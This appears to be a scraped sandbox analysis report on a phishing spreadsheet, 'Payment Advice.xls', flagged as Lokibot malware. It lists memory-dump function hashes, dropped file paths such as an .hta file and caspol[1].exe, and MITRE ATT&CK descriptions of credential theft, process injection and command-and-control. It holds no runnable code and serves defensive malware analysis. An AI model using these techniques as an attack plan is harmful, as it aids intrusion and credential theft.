Instruction Fuzzy Hash: 2121D474D09228CFCB61CF55D884BECBBB6BB49304F249199D81DAB296C7315E81DF40

Function 0013D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521047827.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_13d000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
Instruction ID: c93a144368a3656922636856f90339f43b112a12ea4bafa1108d28c1e8bd612a
Opcode Fuzzy Hash: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
Instruction Fuzzy Hash: 502171755083809FCB06CF14E994711BF71EB46714F28C5DAD8498F266C33AD85ACB62

Function 00C00CE4 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a115ea7d748116354ca4b5f3248356049d6dc77261b912f0937b5a796b856400
Instruction ID: 8cc9e19d57be671b8c28e97a103f1e3f8646328b5de98f7cf5eea3a915722107
Opcode Fuzzy Hash: a115ea7d748116354ca4b5f3248356049d6dc77261b912f0937b5a796b856400
Instruction Fuzzy Hash: 75112875A49218DFDB60CF59CC84BECF7B8AB19704F24819AE94DA7280CBB15AC1CF50

Function 0013D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521047827.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_13d000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction ID: 67c540baf6bac1ad4bbaa40799964805698ccef35c79b973d5445efff56ac4c6
Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction Fuzzy Hash: AE119D75904280DFDB12CF14E5C4B16FFA1FB84314F28C6ADD8494B656C33AD85ACBA2

Function 00C00478 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66c322275e875c6994f6a832d5bb225dde0d06fff42d55bd5d7c4c2c6341a899
Instruction ID: 424176b97bf558c49f6362b73d103ec31ea82e776470377dbedd7fc596c56ee2
Opcode Fuzzy Hash: 66c322275e875c6994f6a832d5bb225dde0d06fff42d55bd5d7c4c2c6341a899
Instruction Fuzzy Hash: FA11F3B8D04209DFCB44DFEAD4496AEBBF5BF89300F2491AAC819A3344E7345A41CF94

Function 00C00D14 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db70643dd82415e0b1dabb938399faaeb79a8e441351ddbdc3d008705016d19a
Instruction ID: e0d4bff455cd82f3a700005c1b9e92d34cbded3c7b3aef23057999e1daa230e1
Opcode Fuzzy Hash: db70643dd82415e0b1dabb938399faaeb79a8e441351ddbdc3d008705016d19a
Instruction Fuzzy Hash: BC11C275A45218DFDB64CF55CC80BECB7B8AB19304F24909AA94DB72C1C7B0AAC1CF10

Function 00C0111D Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe1946d0812837483f3db34f3f5f4fe1d185481b6e02a15c94e1ff8c9e9d5552
Instruction ID: c01710911b2091d6efaf5aa3b2d169ec3378749e7ef67e43a9e3d5d199b0a80c
Opcode Fuzzy Hash: fe1946d0812837483f3db34f3f5f4fe1d185481b6e02a15c94e1ff8c9e9d5552
Instruction Fuzzy Hash: 6F11B075904228CFCB64CF64C985BEDB7F8AB59305F24489AD45DAB281C7349EC5CF50

Function 00C00E47 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af643e1a054cdc130a811caacf67e90983b3b9d0cac12897bfe6c97a9572b7e9
Instruction ID: ff9b363aea825d4bb186a46312e54bebe92069b346a2a33ec583eeebdbfab24d
Opcode Fuzzy Hash: af643e1a054cdc130a811caacf67e90983b3b9d0cac12897bfe6c97a9572b7e9
Instruction Fuzzy Hash: 4701EC75A44214DFDB64CF55CC85BECB7B8AB19304F24819AAA4DAB2C1C7715AC5CF40

Function 00C01204 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f545237354ab326978591bfa2952aeb95a0676dd7737ba683375ba8b239d34ba
Instruction ID: 6240158b348e6f2d3b9b942fe7294453c96401da0ca2774b35750c1231a8a575
Opcode Fuzzy Hash: f545237354ab326978591bfa2952aeb95a0676dd7737ba683375ba8b239d34ba
Instruction Fuzzy Hash: B6013C35906228DFCF20CFA4C944BEDBBB5EF59304F2850DA940DA7291C2315A86DF41

Function 00C01184 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 734adf177e0db0f2d5f34978e89c4f84ffbb1173397af16c1bdbbe0f16d6ac6b
Instruction ID: a3a493cd240d1703bfbb91874782cb1afdd1ade0688c8099a917dda36ec6fe96
Opcode Fuzzy Hash: 734adf177e0db0f2d5f34978e89c4f84ffbb1173397af16c1bdbbe0f16d6ac6b
Instruction Fuzzy Hash: F8013175918394CFCB21CB25C864AE9BBB4AB06311F1886EA985AA72D2D7318945CF50

Function 00C01B38 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db998b100f4b1291709f3e6e7f4a2ff666266b1c5434be3db95cc7ed7b439a96
Instruction ID: c32beff1dbe20b0c066f5d7fc63e117cc6b71fe86cd78912d659e02ce51a5941
Opcode Fuzzy Hash: db998b100f4b1291709f3e6e7f4a2ff666266b1c5434be3db95cc7ed7b439a96
Instruction Fuzzy Hash: 9FF0B7B4E04209DFCB40DFB9D9406AEFBF5EB49300F1895AAC818E3350EB719A41DB80

Function 00C013EF Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3168c5624f4d05094642f68c5b96415caac33daf750e75a917c3f348e014e006
Instruction ID: ed5bf4e5e74fd4c53b64f388f2542005e9c9fad9fa9b923c22abfa61de5a2b57
Opcode Fuzzy Hash: 3168c5624f4d05094642f68c5b96415caac33daf750e75a917c3f348e014e006
Instruction Fuzzy Hash: 5A011975E08258DFDB22CF65CC94ADCBBB5BF5E304F2881A9D909AB296C7315A41CF40

Function 00C00FC8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2bde894cba1d7db87f39a0dfda5034f594925d0e3bf4fd30a0c44a7877c5670
Instruction ID: d02e492a4d72234022404b899fe43dbe21e757dc8ebc464710831cef53eb4a43
Opcode Fuzzy Hash: c2bde894cba1d7db87f39a0dfda5034f594925d0e3bf4fd30a0c44a7877c5670
Instruction Fuzzy Hash: C201ABB59002289FDBA0DF58C881BDCB7B4AB0A311F6585D9D61CA7280CB31AFC5DF50

Function 00C00929 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57382d0769f0087390aff747f458ef943bfaa78a4b4dd16a602dd3ae3e5f2bd6
Instruction ID: b92ff98214b7a3e112658d9f344527263fb2c92095b35c69eb1a7d918dbf1b00
Opcode Fuzzy Hash: 57382d0769f0087390aff747f458ef943bfaa78a4b4dd16a602dd3ae3e5f2bd6
Instruction Fuzzy Hash: 3EF05E30D08208DFDB00EFA9E9987ADBFB4BB4A302F20829AC409A7252D6340A41DF04

Function 00C00938 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.521654291.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_c00000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18f3de2d46cdb7a6833ae619abca51218d0beee1ed3544211cdf564b6de50338
Instruction ID: 784e9ea602475ecdf535874515757a290f8321b0ac616285c01b46a7fc1e66b1
Opcode Fuzzy Hash: 18f3de2d46cdb7a6833ae619abca51218d0beee1ed3544211cdf564b6de50338
Instruction Fuzzy Hash: 29F06530D04208DFDB04EFA9E9487ADBBF8BB49302F2092A5C40DA7352D7301A40DF44

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment Advice.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2638FAB5.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30ADB069.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9420975F.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF4A9302.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E75CCB56.emf

Windows Analysis Report
Payment Advice.xls

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Tactics:	Collection
Data Sources:	Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre